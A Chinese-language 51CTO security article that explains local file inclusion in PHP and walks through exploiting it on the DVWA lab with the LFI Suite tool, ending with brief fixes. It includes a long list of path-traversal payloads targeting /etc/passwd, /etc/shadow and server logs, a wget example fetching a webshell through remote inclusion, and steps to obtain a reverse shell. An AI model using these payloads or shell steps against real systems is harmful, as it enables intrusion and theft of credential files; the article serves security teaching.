51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

如何有效规避本地文件包含简单利用的漏洞攻击

原创
作者:Simeon
安全 漏洞
本文主要是对文件包含做了一个简单的介绍,如文件包含漏洞的简单原理及危害,最重要的是对本地文件包含漏洞的进一步利用,通过本地文件包含漏洞,从而获取到一个反向连接或者是LFI shell。通过本文也让自己对本地文件包含的危害和利用都有了一定的提高,不在是只停留在读取文件上!

【51CTO.com原创稿件】今天在公众号看到了一个本地文件包含的利用工具,看了下国外大牛对该工具的使用的一个视频,感觉很厉害,通过该工具可对存在本地文件包含漏洞的站点进行利用并返回一个LFI shell,通过返回的LFI shell再次获取一个反向连接,从而可执行相关命令,以前对本地文件包含的利用大多都停留在读取文件,如果有远程文件包含的话就可以getshell。

这篇文章主要是对本地文件包含的一个简单介绍及利用,主要是对工具的使用,也主要是记录下该过程,方便以后查看,然后再抽时间研究下大神源代码!大神请绕道而行!: )

0x01 文件包含漏洞原理

文件包含漏洞主要是程序员把一些公用的代码写在一个单独的文件中,然后使用其他文件进行包含调用,如果需要包含的文件使用硬编码,一般是不会出现安全问题,但是有时可能不确定需要包含哪些具体文件,所以就会采用变量的形式来传递需要包含的文件,但是在使用包含文件的过程中,未对包含的变量进行检查及过滤,导致外部提交的恶意数据作为变量进入到了文件包含的过程中,从而导致提交的恶意数据被执行。

文件包含通常分为本地文件包含(Local File Inclusion)和远程文件包含(Remote File Inclusion)。allow_url_fopen和 allow_url_include为0n的情况认为是远程文件包含漏洞,allow_url_fopen为off和 allow_url_include为0n为本地文件包含漏洞,如图1 配置文件所示。本次主要是利用本地文件包含,所以将allow_url_fopen设置为了off。

图1 php.ini配置

另外,文件包含漏洞主要涉及到的危险函数有四个:include(),require()和include_once(),require_once()。

include():执行到include时才包含文件,找不到被包含文件时只会产生警告,脚本将继续执行。

require():只要程序一运行就包含文件,找不到被包含的文件时会产生致命错误,并停止脚本。

include_once()和require_once():若文件中代码已被包含则不会再次包含。(来自简书)

0x02 文件包含漏洞危害

通过文件包含漏洞,可以读取系统中的敏感文件,源代码文件等,如密码文件,通过对密码文件进行暴力破解,若破解成功则可获取操作系统的用户账户,甚至可通过开放的远程连接服务进行连接控制;另外文件包含漏洞还可能导致执行任意代码,不管本地文件包含还是远程文件包含!

常见的利用方法有以下三点:

一、读取目标主机上的其他文件,主要是本地文件包含。

二、包含可运行的网页木马,主要是远程文件包含,前提是"allow_url_fopen"是激活的(默认是激活的,没几个人会修改)。

三、包含一个创建文件的相应代码文件,因为通过文件包含漏洞获取的shell不是长久的,如果这个漏洞修补了,那么shell也就不存在了,因此需要创建一个真实的shell。我们可以先包含一个可以执行cmd的伪shell,然后使用wget加-O参数(类似:

http://x.x.x.x/index.php?page=http://www.1ster.cn/cmd.txt?cmd=wget http://x.x.x.x/muma.txt -O muma.php)获取一个真正的webshell。如果系统中没有wget命令,获取目录不可写,那么我们可以包含一个创建文件的脚本,然后通过脚本上传木马文件。

除了以上三点外,应该还有一点就是执行任意命令!

0x03 实验环境

本次实验环境主要是利用dvwa平台进行演示,如图2所示。DVWA(Damn Vulnerable Web Application)是用PHP+MySQL编写的一套Web漏洞平台,说简单点就是所谓的网站漏洞靶机,该平台包含了SQL注入、XSS、本地文件包含、命令执行等一些常见的Web安全漏洞,并且该平台是开源的,可以从官网直接下载。

图2 dvwa平台

0x04 本地文件包含利用工具

本次主要使用的是LFI SUIT本地文件包含利用工具,是一款用Python2.7编写的神器,适用于Windows,Linux和OS X,并且首次使用会自动配置,自动安装需要的模块,该工具提供了九种不同的文件包含攻击模块,如图3所示。

另外当你通过一个可利用的攻击获取到一个LFI shell后,你可以通过输入“reverseshell”命令轻易地获得一个反向shell。但是前提是你必须让你的系统监听反向连接,比如使用“nc –lvp port”。

图3 九种不同的文件包含攻击模块

0x05 本地文件包含读取文件

在之前的本地文件包含漏洞中,大多数都是进行读取文件,如Linux下的密码文件(../../../../etc/shadow以及../../../../etc/passwd),获取并读取一些你知道物理路径的一些文件,如图4所示。

图4 读取已知路径下的文件

以下是一些简单的测试用例,根据实际情况进行适当的修改。

../../tomcat/conf/tomcat-users.xml

../

%2e%2e%2f which translates to ../

%2e%2e/ which translates to ../

..%2f which translates to ../

%2e%2e%5c which translates to ..\

%c1%1c

%c0%9v

%c0%af

..%5c../

../../../../../../../../../../../../etc/hosts%00

../../../../../../../../../../../../etc/hosts

../../boot.ini

/../../../../../../../../%2A

../../../../../../../../../../../../etc/passwd%00

../../../../../../../../../../../../etc/passwd

../../../../../../../../../../../../etc/shadow%00

../../../../../../../../../../../../etc/shadow

/../../../../../../../../../../etc/passwd^^

/../../../../../../../../../../etc/shadow^^

/../../../../../../../../../../etc/passwd

/../../../../../../../../../../etc/shadow

/./././././././././././etc/passwd

/./././././././././././etc/shadow

\..\..\..\..\..\..\..\..\..\..\etc\passwd

\..\..\..\..\..\..\..\..\..\..\etc\shadow

..\..\..\..\..\..\..\..\..\..\etc\passwd

..\..\..\..\..\..\..\..\..\..\etc\shadow

/..\../..\../..\../..\../..\../..\../etc/passwd

/..\../..\../..\../..\../..\../..\../etc/shadow

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow

\..\..\..\..\..\..\..\..\..\..\etc\passwd%00

\..\..\..\..\..\..\..\..\..\..\etc\shadow%00

..\..\..\..\..\..\..\..\..\..\etc\passwd%00

..\..\..\..\..\..\..\..\..\..\etc\shadow%00

%0a/bin/cat%20/etc/passwd

%0a/bin/cat%20/etc/shadow

%00/etc/passwd%00

%00/etc/shadow%00

%00../../../../../../etc/passwd

%00../../../../../../etc/shadow

/../../../../../../../../../../../etc/passwd%00.jpg

/../../../../../../../../../../../etc/passwd%00.html

/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd

/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow

%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00

/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00

%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00

%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini

/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini

\\'/bin/cat%20/etc/passwd\\'

\\'/bin/cat%20/etc/shadow\\'

../../../../../../../../conf/server.xml

/../../../../../../../../bin/id|

C:/inetpub/wwwroot/global.asa

C:\inetpub\wwwroot\global.asa

C:/boot.ini

C:\boot.ini

../../../../../../../../../../../../localstart.asp%00

../../../../../../../../../../../../localstart.asp

../../../../../../../../../../../../boot.ini%00

../../../../../../../../../../../../boot.ini

/./././././././././././boot.ini

/../../../../../../../../../../../boot.ini%00

/../../../../../../../../../../../boot.ini

/..\../..\../..\../..\../..\../..\../boot.ini

/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini

\..\..\..\..\..\..\..\..\..\..\boot.ini

..\..\..\..\..\..\..\..\..\..\boot.ini%00

..\..\..\..\..\..\..\..\..\..\boot.ini

/../../../../../../../../../../../boot.ini%00.html

/../../../../../../../../../../../boot.ini%00.jpg

/.../.../.../.../.../

..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bo

../../../../../../../../../../var/log/httpd/access_log

../../../../../../../../../../var/log/httpd/error_log

../apache/logs/error.log

../apache/logs/access.log

../../apache/logs/error.log

../../apache/logs/access.log

../../../apache/logs/error.log

../../../apache/logs/access.log

../../../../../../../../../../etc/httpd/logs/acces_log

../../../../../../../../../../etc/httpd/logs/acces.log

../../../../../../../../../../etc/httpd/logs/error_log

../../../../../../../../../../etc/httpd/logs/error.log

../../../../../../../../../../var/www/logs/access_log

../../../../../../../../../../var/www/logs/access.log

../../../../../../../../../../usr/local/apache/logs/access_log

../../../../../../../../../../usr/local/apache/logs/access.log

../../../../../../../../../../var/log/apache/access_log

../../../../../../../../../../var/log/apache/access.log

../../../../../../../../../../var/log/access_log

../../../../../../../../../../var/www/logs/error_log

../../../../../../../../../../var/www/logs/error.log

../../../../../../../../../../usr/local/apache/logs/error_log

../../../../../../../../../../usr/local/apache/logs/error.log

../../../../../../../../../../var/log/apache/error_log

../../../../../../../../../../var/log/apache/error.log

../../../../../../../../../../var/log/access_log

../../../../../../../../../../var/log/error_log

/var/log/httpd/access_log

/var/log/httpd/error_log

../apache/logs/error.log

../apache/logs/access.log

../../apache/logs/error.log

../../apache/logs/access.log

../../../apache/logs/error.log

../../../apache/logs/access.log

/etc/httpd/logs/acces_log

/etc/httpd/logs/acces.log

/etc/httpd/logs/error_log

/etc/httpd/logs/error.log

/var/www/logs/access_log

/var/www/logs/access.log

/usr/local/apache/logs/access_log

/usr/local/apache/logs/access.log

/var/log/apache/access_log

/var/log/apache/access.log

/var/log/access_log

/var/www/logs/error_log

/var/www/logs/error.log

/usr/local/apache/logs/error_log

/usr/local/apache/logs/error.log

/var/log/apache/error_log

/var/log/apache/error.log

/var/log/access_log

/var/log/error_log

../../../WEB-INF/web.xml

0x06 神器简单获取LFI shell

运行LFI SUIT工具及选择攻击模块

直接使用python lfisuite.py,如图5所示。此时我们选择利用功能模块1。

图5 运行本地文件包含利用工具

设置cookie

在我们选择利用功能模块1后,会提示让我们输入cookie,如图6所示:

图6 设置cookie

获取cookie

浏览器F12console输入document.cookie即可获取到当前cookie,如图7所示。

图7 获取cookie

成功获取LFI shell

输入cookie后,我们随便选择一个攻击模块试试,在此我们选择3,选取攻击模块后,我们输入漏洞地址即可成功获取到一个shell,如图8所示。

图8 成功获取LFI shell

0x07 自动模块获取lfi shell

如果我们不知道那个攻击模块可以返回shell,我们可以选择自动攻击模块。

图9 自动攻击模块

选择之后,我们需要选择一个包含路径的文件,我们选择当前目录下的一个文件即可。

图10 选择文件

选择文件后,该工具会尝试可能性的路径,并且加以利用。

图11 选择文件

如图12所示,我们成功获取了一个shell。

图12 成功获取shell

0x08 获取一个反向连接

在我们已经获取到lfi shell后,我们可以使用reverseshell来获取一个反向连接,我们先进行监听反向连接,如图13所示。

图13 设置监听反向连接

我们输入reverseshell后,设置IP即可

图14 设置ip及端口

此时,我们也成功获取到了一个反向连接,如图15所示。

图15 获取到反向连接

0x09 扫描模块

另外,我们也可以先使用扫描模块,然后在选择对应的攻击模块也能成功获取到LFI shell。使用方法与上面都是一样的,再次就不再进行描述了。

0x10 总结与修复

本文主要是对文件包含做了一个简单的介绍,如文件包含漏洞的简单原理及危害,最重要的是对本地文件包含漏洞的进一步利用,通过本地文件包含漏洞,从而获取到一个反向连接或者是LFI shell。通过本文也让自己对本地文件包含的危害和利用都有了一定的提高,不在是只停留在读取文件上!

通过对该漏洞的利用,最安全的是设置allow_url_fopen和 allow_url_include为0ff,这样就不能利用该漏洞了,另一方面可以做白名单限制,相当于是硬编码,直接把需要包含的文件固定死,这样既不会影响业务,也不会很轻松被利用,其次还是要对用户的输入保持怀疑态度,对用户的输入变量进行严格的检查及过滤! 

【51CTO原创稿件,合作站点转载请注明原文作者和出处为51CTO.com】

责任编辑:庞桂玉 来源: 51CTO.com
网络安全本地文件漏洞攻击
相关推荐
如何利用Vailyn识别路径遍历和文件包含漏洞
Vailyn是一款多阶段漏洞分析和利用工具,可以帮助广大研究人员分析、识别和利用路径遍历漏洞以及文件包含漏洞。该工具的性能非常强,并且害实现了大量的过滤规避技术。

2021-11-08 07:26:36

Vailyn漏洞安全工具
APT攻击背后秘密:攻击漏洞利用
本文我们将探讨APT攻击中的漏洞利用,在这个阶段情况已经急转直下,因为攻击者已经成功交付其恶意有效载荷。

2014-02-25 09:29:41

PHP文件包含漏洞原理分析和利用方法
一、涉及到的危险函数〔include(),require()和includeonce(),requireonce()〕include()&&require()语句:包括并运行指定文件。这两种结构除了在如何处理失败之外完全一样。include()产生一个警告而require()则导致一个致命错误。换句话说,如果你想在遇到丢失文件时停止处理页面就用require()。include()就不是这样。

2009-07-06 17:47:44

黑客利用Adobe漏洞定点攻击 警惕xls文件
本文主要向大家介绍了黑客的最新攻击行为即利用AdobeFlashReader0day漏洞进行定点攻击,希望大家引起注意。

2011-03-18 10:23:27

Kadimus:本地文件包含(LFI)漏洞检测工具
Kadimus是一个用于检测网站本地文件包含(LFI)漏洞的安全工具。它有着怎样的特性呢,小编下面为您介绍。

2015-04-02 16:26:39

漏洞检测工具Kadimus
IPS攻击规避技术之FTP规避
IPS系统作为企业防护系统,一贯的是黑客们想要攻破的目标,在实施IPS攻击规避技术中,除了RPC协议规避、TCPIP处理机制规避、URL混淆规避这几种主要的IPS攻击规避方式,还包括本篇文章所提到的FTP规避技术。

2010-09-08 17:11:32

攻击规避检测技术看IPS安全有效
本文主要从“安全有效性”角度,以攻击规避流量检测为例,描述IPS产品所面临的挑战,以及相应的解决思路。

2010-07-28 16:40:38

IPS攻击规避技术之RPC协议规避
本文简述了黑客攻击者为了实现IPS攻击规避,对RPC请求进行分片处理,通过RPC协议规避技术逃避IPS系统对异常行为的检测,并且实施入侵。

2010-09-08 16:23:22

如何有效防止ARP攻击
ARP欺骗和攻击问题,是企业网络的心腹大患。关于这个问题的讨论已经很深入了,对ARP攻击的机理了解的很透彻,各种防范措施也层出不穷。

2013-02-22 15:41:47

微软警告黑客利用PowerPoint漏洞攻击
据悉,该漏洞涉及微Office2000SP3、2002SP3和2003SP3,黑客可以利用用户打开某个受控PowerPoint文件进行攻击。当该文件打开后,PowerPoint将访问内存中的无效对象,这使得黑客可以远程执行该电脑系统的密码。

2009-04-06 07:06:39

利用大数据有效防范网络攻击
当云计算、物联网的热潮逐渐消退,大数据顺势而上,无疑成为当下最火热的技术趋势。大数据带来的变化不言而喻:爆炸式增长的数据以及丰富的数据来源都成为大数据极为显著的特性。然而大数据的兴起,也给传统的网络和信息安全带来了一些错综复杂的问题。

2014-05-28 10:16:11

IPS攻击规避技术之TCP/IP协议规避
IDS作为传统的防护工具已经可以被黑客成功绕过,作为IDS的替代品IPS安全防护系统,通过TCPIP协议中数据传输错误,黑客攻击者也可以利用IPS系统的缺陷实施IPS攻击规避。

2010-09-08 16:09:02

利用第三方软件漏洞发起攻击如何阻击
利用漏洞的攻击是让网管员非常头疼的一类攻击。该如何预防此类攻击呢本文将为你讲解。

2009-04-20 09:36:33

攻击利用Citrix NetScaler设备漏洞,放大DDoS攻击
Citrix发布了一份紧急警告,通知客户,某些受到影响的NetScaler应用程序的交付控制器(ADC)设备出现了安全问题,攻击者正利用该问题对多个目标发动大规模分布式拒绝服务(DDoS)攻击。

2020-12-30 09:27:55

漏洞DDoS攻击网络攻击
当前黑客攻击主要利用软件本身漏洞
如今的黑客攻击主要利用软件本身的安全漏洞,这些漏洞是由不良的软件架构和不安全的编码产生的。

2013-05-06 10:42:52

俄黑客组织利用WinRAR漏洞攻击乌克兰
具有俄罗斯背景的黑客组织UAC0099正在利用WinRAR中的一个零日漏洞(已修复,编号CVE202338831)对乌克兰传播LONEPAGE恶意软件。

2023-12-26 16:29:15

利用 Opera 浏览器中存储XSS漏洞读取本地文件
这篇文章就是我发现的一个漏洞——网页可能会从用户那里检索本地文件的屏幕截图。

2021-09-26 05:32:58

漏洞OperaXSS
本地文件包含漏洞检测工具:Burp国产插件LFI scanner
LFIscannerchecks是为了我自己为burp轻量级扫描器做的一个检测LFI漏洞插件,因为burp没有一个有效的检测LFI功能的,只能自己写一个插件了。

2015-08-17 15:10:11

漏洞检测安全工具LFI scanner
浅析利用交换机漏洞几种攻击手段
交换机市场近年来一直保持着较高的增长势头,到2009年市场规模有望达到15.1亿美元。交换机在企业网中占有重要的地位,通常是整个网络的核心所在,这一地位使它成为黑客入侵和病毒肆虐的重点对象,为保障自身网络安全,企业有必要对局域网上的交换机漏洞进行全面了解。以下是利用交换机漏洞的五种攻击手段。

2011-12-16 13:45:22

如何有效防止SQL注入攻击
SQL注入攻击是黑客对数据库进行攻击常用的手段之一,随着BS模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。

2020-08-07 08:13:08

SQL攻击模式
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服